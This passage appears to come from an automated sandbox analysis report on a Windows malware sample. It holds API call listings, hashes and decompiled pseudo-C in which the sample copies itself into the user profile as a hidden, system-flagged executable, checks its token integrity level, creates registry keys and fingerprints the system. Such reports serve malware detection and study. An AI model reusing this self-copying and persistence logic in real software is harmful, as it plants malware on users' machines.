                                                                                                                                                                                                                                                                                          0x04005861
                                                                                                                                                                                                                                                                                          0x04005873
                                                                                                                                                                                                                                                                                          0x04005880
                                                                                                                                                                                                                                                                                          0x04005896
                                                                                                                                                                                                                                                                                          0x0400589c
                                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                                          0x040058ab
                                                                                                                                                                                                                                                                                          0x040058d0
                                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                                          0x04005912
                                                                                                                                                                                                                                                                                          0x040058e4
                                                                                                                                                                                                                                                                                          0x040058ed
                                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                                          0x0400592c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                                                          • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                          • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 592 4001120-4001134 593 400113a-400113e 592->593 594 40012bb-40012c1 592->594 593->594 595 4001144-4001150 lstrlenA 593->595 595->594 596 4001156-4001162 lstrlenA 595->596 596->594 597 4001168-4001175 596->597 598 4001177-4001188 GetAllUsersProfileDirectoryA 597->598 599 400118a-400119b GetEnvironmentVariableA 597->599 600 40011a1-40011d9 wnsprintfA lstrcmpiA 598->600 599->600 601 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 600->601 602 40011db-40011e1 600->602 606 40012a3-40012b8 call 40097c0 601->606 607 4001289-400128d 601->607 602->601 603 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 602->603 603->601 606->594 608 400129a-40012a1 607->608 609 400128f-4001298 607->609 608->594 609->608
                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                                          				void* _v288;
                                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                                          				void* _v560;
                                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x104;
                                                                                                                                                                                                                                                                                          					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                                          					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						CopyFileA(_a4,  &_v556, 0); // executed
                                                                                                                                                                                                                                                                                          						SetFileAttributesA( &_v556, 6); // executed
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                                          					_v16 = _v560;
                                                                                                                                                                                                                                                                                          					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                                          					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                                          					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v288 = _t58;
                                                                                                                                                                                                                                                                                          					if(_v288 == 0) {
                                                                                                                                                                                                                                                                                          						_v564 = _v16;
                                                                                                                                                                                                                                                                                          						E040097C0(_v564);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                                                                          							 *_a20 = _v288;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x04001129
                                                                                                                                                                                                                                                                                          0x04001134
                                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                                          0x04001175
                                                                                                                                                                                                                                                                                          0x0400119b
                                                                                                                                                                                                                                                                                          0x04001177
                                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                                          0x040011bd
                                                                                                                                                                                                                                                                                          0x040011d9
                                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                                          0x040011ff
                                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                                          0x04001223
                                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                                          0x04001249
                                                                                                                                                                                                                                                                                          0x0400125d
                                                                                                                                                                                                                                                                                          0x04001274
                                                                                                                                                                                                                                                                                          0x0400127a
                                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                                          0x040012a6
                                                                                                                                                                                                                                                                                          0x040012b3
                                                                                                                                                                                                                                                                                          0x04001289
                                                                                                                                                                                                                                                                                          0x0400128d
                                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                                          0x040012c1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: HeapFree.KERNEL32(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                                          • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                          • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                          			E040099F0() {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                                                                                                                          				char _v2068;
                                                                                                                                                                                                                                                                                          				long _v2072;
                                                                                                                                                                                                                                                                                          				void* _v2076;
                                                                                                                                                                                                                                                                                          				void* _v2080;
                                                                                                                                                                                                                                                                                          				char _v2084;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v9;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2072 = 0;
                                                                                                                                                                                                                                                                                          				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                                          				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                                          				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                                          				_v2084 = 0x44;
                                                                                                                                                                                                                                                                                          				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                                          							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x040099f9
                                                                                                                                                                                                                                                                                          0x040099fd
                                                                                                                                                                                                                                                                                          0x04009a19
                                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                                          0x04009a1f
                                                                                                                                                                                                                                                                                          0x04009a3a
                                                                                                                                                                                                                                                                                          0x04009a4a
                                                                                                                                                                                                                                                                                          0x04009b76
                                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                                          0x04009a56
                                                                                                                                                                                                                                                                                          0x04009a77
                                                                                                                                                                                                                                                                                          0x04009a7f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009a8b
                                                                                                                                                                                                                                                                                          0x04009a91
                                                                                                                                                                                                                                                                                          0x04009aad
                                                                                                                                                                                                                                                                                          0x04009acb
                                                                                                                                                                                                                                                                                          0x04009ae6
                                                                                                                                                                                                                                                                                          0x04009b04
                                                                                                                                                                                                                                                                                          0x04009b1c
                                                                                                                                                                                                                                                                                          0x04009b3a
                                                                                                                                                                                                                                                                                          0x04009b52
                                                                                                                                                                                                                                                                                          0x04009b70
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b72
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b3c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009b06
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                                          					E04007D20(_t27, "Mvqcsgcuwwini", 0, 0xe);
                                                                                                                                                                                                                                                                                          					lstrcpyA("Mvqcsgcuwwini", "WDefault");
                                                                                                                                                                                                                                                                                          					_t33 = E04005930(_a4 + 0x45b, "Mvqcsgcuwwini", 0xd); // executed
                                                                                                                                                                                                                                                                                          					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                          					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                                          						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                                          						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a8, "Mvqcsgcuwwini");
                                                                                                                                                                                                                                                                                          							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04005a07
                                                                                                                                                                                                                                                                                          0x04005a12
                                                                                                                                                                                                                                                                                          0x04005a35
                                                                                                                                                                                                                                                                                          0x04005a47
                                                                                                                                                                                                                                                                                          0x04005a5d
                                                                                                                                                                                                                                                                                          0x04005a6f
                                                                                                                                                                                                                                                                                          0x04005a77
                                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                                          0x04005a8c
                                                                                                                                                                                                                                                                                          0x04005a97
                                                                                                                                                                                                                                                                                          0x04005aa1
                                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                                          0x04005ac8
                                                                                                                                                                                                                                                                                          0x04005ace
                                                                                                                                                                                                                                                                                          0x04005ad5
                                                                                                                                                                                                                                                                                          0x04005adc
                                                                                                                                                                                                                                                                                          0x04005b00
                                                                                                                                                                                                                                                                                          0x04005b08
                                                                                                                                                                                                                                                                                          0x04005b20
                                                                                                                                                                                                                                                                                          0x04005b31
                                                                                                                                                                                                                                                                                          0x04005b0a
                                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                                          0x04005b4b

                                                                                                                                                                                                                                                                                          APIs
